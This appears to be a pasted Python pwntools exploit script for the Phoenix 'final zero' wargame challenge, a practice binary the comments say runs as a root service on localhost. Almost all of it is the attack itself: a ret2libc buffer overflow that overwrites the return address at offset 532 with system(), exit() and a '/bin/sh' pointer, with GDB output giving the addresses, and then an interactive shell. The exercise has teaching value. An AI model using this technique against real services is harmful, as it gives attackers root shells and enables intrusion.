final 0 phoenix ret2libc

a guest
Jun 7th, 2019
  1. #!/usr/bin/python
  2.  
  3. from pwn import *
  4.  
# Connection to the running challenge service; main() below reads this global.
p = remote(host="localhost", port=64013)
  6.  
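def main():
    """
    Drive the Phoenix final-zero ret2libc exercise over the module-level
    connection ``p``.

    Lab set-up note (kept from the original script): the challenge binary
    was run as a systemd service.  Relevant part of the unit file under
    /etc/systemd/system, i.e. the daemon runs as root:

        [Service]
        Type=simple
        Restart=always
        #User=phoenix-i386-final-zero
        User=root

    Uses ``p``, ``log`` and ``p32`` from the module scope (``from pwn import *``).
    Returns nothing: control of the connection is handed to the user via
    ``p.interactive()``.
    """

    # Skips prompt: read and discard whatever the service sends first.
    p.recvrepeat(0.2)

    # From GDB:
    #
    # Stopped reason: SIGSEGV
    # 0x41507341 in ?? ()
    #
    # gdb-peda$ pattern_offset 0x41507341
    # 1095791425 found at offset: 532
    #
    # i.e. the saved return address starts 532 bytes into the input.
    ret_offset = 532

    # From GDB:
    #
    # gdb-peda$ p system
    # $4 = {<text variable, no debug info>} 0xf7fad824 <system>
    #
    # gdb-peda$ p exit
    # $5 = {<text variable, no debug info>} 0xf7f7f543 <exit>
    #
    # gdb-peda$ find "/bin/sh"
    # Found 2 results, display max 2 items:
    # libc.so : 0xf7ff867a ("/bin/sh")
    # --snip--
    #
    # NOTE(review): these are absolute addresses from one debugging session;
    # they only stay valid while libc is mapped at the same base (presumably
    # ASLR is off in this lab — confirm), otherwise they must be re-derived.
    system_addr = 0xf7fad824
    bin_sh_addr = 0xf7ff867a
    exit_addr = 0xf7f7f543

    # Stack layout after the overflow.  The word after the overwritten return
    # address is what system() will treat as its own return address, and the
    # word after that as its first argument (32-bit calling convention):
    #---------------#
    # 532 A(Junk)   #
    #---------------#
    # system_addr   #  <- overwrites the saved return address
    #---------------#
    # exit_addr     #  <- where system() "returns": graceful exit
    #---------------#
    # bin_sh_addr   #  <- argument to system()
    #---------------#

    log.info("Crafting payload")
    # Bytes literals throughout: p32() yields bytes, so the original
    # str + bytes concatenation breaks under Python 3.
    buf = b"".join([
        b"A" * ret_offset,
        p32(system_addr),
        p32(exit_addr),  # Graceful exit
        p32(bin_sh_addr),
    ])

    p.sendline(buf)  # Sends payload
    log.warn("Payload sent!")

    p.interactive()  # Pass interaction back to user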
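if __name__ == "__main__":
    # The call must be indented under the guard; as pasted it sat at column 0,
    # which is an IndentationError in Python.
    main()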